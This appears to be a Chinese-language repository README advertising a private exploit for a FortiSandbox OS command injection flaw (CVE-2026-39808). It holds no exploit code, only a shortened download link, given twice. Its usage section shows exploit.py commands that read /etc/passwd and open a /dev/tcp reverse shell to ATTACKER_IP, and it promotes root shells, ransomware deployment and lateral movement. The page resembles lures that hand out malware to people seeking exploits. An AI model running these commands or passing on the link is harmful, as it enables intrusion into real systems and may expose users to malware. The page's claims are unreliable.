Lechansky/CVE-2026-39808

# CVE-2026-39808 ## 概述 Fortinet FortiSandbox 版本 4.4.0 至 4.4.8 中存在不当中和用于操作系统命令的特殊元素（OS 命令注入）漏洞。该漏洞允许攻击者通过未指定的攻击向量执行未经授权的代码或命令。 ## 漏洞利用： ### [在此下载](https://tinyurl.com/ykr8dmph) ## 详细信息 + **CVE ID**：CVE-2026-39808 + **发布日期**：2026/04/14 + **影响等级**：严重 + **漏洞利用状态**：未公开，仅限私有 + **CVSS**：9.8 + **补丁可用性**：（尚未有官方补丁） ## 影响 具有网络访问权限的未认证攻击者可以在无需用户交互的情况下，在受影响的 FortiSandbox 系统上执行任意操作系统命令。成功利用可能导致完整的系统妥协，包括未经授权的代码执行、数据操纵和拒绝服务。该漏洞的 CVSS 3.1 基础评分为 9.8，表明严重程度高，对机密性、完整性和可用性均有重大影响。 - 设备的完整 root 权限 shell - 完整的系统妥协 - 数据泄露 / 勒索软件部署 - 跳转到安全架构（FortiGate、FortiAnalyzer 等） ## 受影响版本 Fortinet FortiSandbox 版本 4.4.0 至 4.4.8 ## 使用方法 ``` python3 exploit.py -t https://192.168.1.100 -c "id" python3 exploit.py -t https://target.fortisandbox.local -c "cat /etc/passwd" python3 exploit.py -t https://target -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" ``` ## 联系方式 + **如有疑问，请联系**：alexandron2341@outlook.com + **漏洞利用**：[此处](https://tinyurl.com/ykr8dmph)

标签：Burp Suite 替代, CVE-2026-39808, CVSS 9.8, CWE-78, Fortinet, FortiSandbox, OS命令注入, 事件响应, 勒索软件, 命令注入, 威胁模拟, 安全公告, 安全设备漏洞, 未认证攻击, 横向移动, 漏洞, 系统完全沦陷, 编程工具, 编程规范, 远程代码执行, 逆向工具, 零日